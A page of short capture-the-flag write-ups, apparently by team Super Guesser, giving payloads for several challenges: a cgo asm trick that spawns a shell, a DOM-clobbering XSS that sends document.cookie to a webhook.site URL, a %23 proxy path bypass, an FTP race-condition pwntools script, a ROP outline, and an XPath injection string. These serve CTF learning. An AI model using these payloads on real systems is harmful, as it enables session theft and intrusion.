gotojail
Noticed that we can use cgo
Bypassed (){} blacklist by using asm() to spoof free function and a gadget in #<netipx/ipx.h>
package main
//#include <netipx/ipx.h>
//#define SIOCPROTOPRIVATE"free:movq $0x6873,\050%rdi);jmp system;.globl free;"
//__asm__ SIOCAIPXITFCRT;
import "C"
func main(){}
- Web Blink We clobbered the body property with a frame (<iframe name=body>) and then the togglePopover property with an anchor tag <a id=togglePopver >. Then setInterval will receive our anchor tag as first argument and will do toString on it which will turn it into our payload and then will execute it. poc: <script> window.open(`http://web:3000/#%3Ciframe%20srcdoc=%22%3Ca%20href='tel:/df/;eval(window.name)'%20id=togglePopover%20%3E%3C/a%3E%22%20name=body%3E%3C/iframe%3E`,'fetch("https://webhook.site/f038dd80-dd62-45a4-8928-696a140f8b12?a="+document.cookie);') </script> eeejs
G0RiyA changed 2 years agoView mode
- Team Super Guesser Web flagstore The proxy handling part in nodejs use url.parse once. Becase of this it drops anything after #. If we put %23 anywhere in the url, anythihng after that will not be send to nginx. This allows us to bypass /api/_ restriction. curl http://flagstore.sstf.site:8000/api/order/%2e%2e/_secret/keys%23/%2e%2e/%2e%2e/%2e%2e/api/
sqrtrev changed 2 years agoView mode
- chatUWU nonheavyftp There is a race condition in the application. When the other thread is wait for connection, we can change the path with the USER command. from pwn import * p = remote('47.89.253.219',2121); p.send(b'USER anonymous\r\n') p.recvline() p.send(b'PASS df\r\n')
parrot409 changed 2 years agoView mode - View modeby Super Guesser Pwnable koncha A simple stack bof challenge. There is a libc-related value on the stack (specifically, same address with name) Just send a blank line then we can get libc leak. After we can build ROP chain. #!/usr/bin/env python3
- Web Yet Another Injection We can get source code from hint array_push($users, "guest:".hash("sha256", "guest")); in login.php So we can login as guest In index.php, javascript has show_detail() show_detail() can read xml data and we can do xpath injection show_detail("-1' or @published='no' or Idx/text()='-1");
